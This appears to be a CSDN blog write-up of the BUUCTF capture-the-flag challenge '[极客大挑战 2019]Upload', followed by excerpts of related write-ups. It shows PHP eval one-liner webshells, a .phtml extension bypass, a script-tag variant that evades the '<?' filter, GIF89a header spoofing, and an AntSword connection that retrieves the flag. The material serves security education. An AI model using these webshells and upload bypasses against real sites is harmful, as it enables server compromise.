BUUCTF WEB [极客大挑战 2019]Upload

最新推荐文章于 2024-04-24 19:59:15 发布
最新推荐文章于 2024-04-24 19:59:15 发布
阅读量514 收藏 2
点赞数 1
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124219768
版权
本文详细记录了一次Web安全挑战中针对PHP文件上传漏洞的利用过程。通过尝试不同的文件内容和后缀,最终成功上传了一个.phtml文件并伪装成图片。利用蚁剑连接到服务器,找到了上传文件的路径并获取了flag。该过程涉及文件后缀修改、内容过滤绕过及文件头伪装等技巧。
摘要由CSDN通过智能技术生成

BUUCTF WEB [极客大挑战 2019]Upload

  • 尝试提交一句话木马shell.php

    <?php @eval($_POST['shell']);?>

    回显为

    NOT!php!

    说明需要修改文件后缀

  • 修改文件后缀为.phtml后尝试提交,回显为

    NO! HACKER! your file included '<?'

    说明不能包含<?,尝试绕过过滤

  • 将文件内容修改为

    <script language="php">eval($_POST['shell']);</script>

    回显为

    Don't lie to me, it's not image at all!!!

    说明会检查文件内容,尝试修改文件头

  • 将文件内容修改为

    GIF89a
<script language="php">eval($_POST['shell']);</script>

    将其伪装成图片文件,回显为

    上传文件名: shell.phtml

    上传成功

  • 使用蚁剑连接,这里需要猜测上传文件路径,最后的路径为

    /upload/shell.phtml

  • 在文件根目录下找到flag

    flag{10b82eab-f326-4da4-9be7-eb3a6cc0378b}
Y1Daa
关注
专栏目录
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 903
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1119
Upload=> 文件上传漏洞。
BUUCTF [极客挑战 2019] Upload
Senimo
12-17 2618
BUUCTF [极客挑战 2019] Upload 考点: 1. 启动环境: 有上传头像的地方,首先上传正常图片测试: 上传了一张.jpg格式的文件,也显示不是图片 后续测试.php、.txt都不行,可能不止限制了文件后缀,使用BurpSuite抓取数据包: ...
Buuctf极客挑战2019upload
m0_64444909的博客
04-07 5253
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
CTF中的BUUCTF之[极客挑战 2019]Upload
weixin_44632787的博客
06-17 609
CTF中的BUUCTF之[极客挑战 2019]Upload 启动我们的挑战项目 这个界面,一看就知道是文件上传的类型的题目了 所以用我之前准备好的一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 之所以用这种一句话木马,是因为这种过滤方法比原版的:<?php @eval($_POST['attack']);?> 要好用。(个人观点) 将上面的一句话木马保存为1.png。 然后开
BUUCTF:[极客挑战 2019]Upload
末初的CSDN博客
11-04 335
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload POST /upload_file.php HTTP/1.1 Host: b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/.
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 5189
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 960
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1799
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
BUUCTF-WEB
ccfly1012的博客
11-02 3883
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF[极客挑战2019]Upload
weixin_45253622的博客
05-07 196
文件上传过滤和绕过 打开题目,发现了一个可以上传图片的上传点。 我们上传一句话木马试试; 会显示不是图片,我们BP抓包修改类型试试:(由于电脑把我的一句话删掉了,所以这里使用phtml来上传一句话木马) phtml就是嵌入php代码的html文件。 修改类型为:image/jpeg 放包发现: 盲猜后台上传地址为 http://52159d7e-a98b-453c-ab5e-6f3741dd9748.node3.buuoj.cn/upload/ 菜刀连接:http://5215
BUUCTFUpload [极客挑战 2019]
金 帛的博客
04-19 1287
BUUCTF的WP
BUUCTF——[极客挑战 2019]Upload 1
qq_53175607的博客
12-04 2688
1.打开后发现是文件上传题 构建一句话木马 <?php @eval($_POST['shy']);?> 将一句话木马改成jpg文件尝试上传。 抓包改成php 提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头 2.然后和一步骤一样上传 ...
BUUCTF WEB [极客挑战 2019]Upload1
guishengyx的博客
10-19 174
上传图片 第一时间想到上传木马 先试一下<?php eval($_REQUEST[8])?>写到txt中改后缀jpg上传 看来不行 试一下图片马 copy yy.jpg/b + muamua.php mama.jpg 上传 还是不行 换个思路 提示过滤了<? 去百度找找有没有其他的一句话木马 GIF89a? <script language="php">eval($_REQUEST[1])</script> 这个没有'&...
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1371
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
BUUCTF [web专项13][极客挑战 2019]Upload
yanglinchiji的博客
11-02 236
注意:连接密码是你上传的一句话密码里包含的,如果不是按照我的一句话代码的话,需要自行更改连接密码。说是不能是php,估计是看了后缀名,将文件的后缀修改成.phtml试试。大佬说一般默认就是upload目录,有些可以在源代码中看到上传地址。估计php的一句话木马不行了,到这里脑子就烧了,开始网上冲浪。发现了GIF89,即自己的上传文件,可以用蚁剑连一下。老规矩,抓包修改类型为图片类型看看能不能绕过。发现提交后,出现不是图片的错误。估计是有内容的检测,大佬说。好了,成功连接到网站了。上传后,发现还有错误。
[极客挑战 2019]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 592
添加头文件:GIF89a改文件格式为image/jpegcheck。
ctf题集【BUUCTF WEB】[极客挑战 2019]Upload1
qq_42667028的博客
01-06 748
alert("whoami")
BUUCTF-极客挑战2019
Atkx's Blog
01-27 689
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
极客挑战2019Upload解题
Bird&Bird
10-26 3875
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值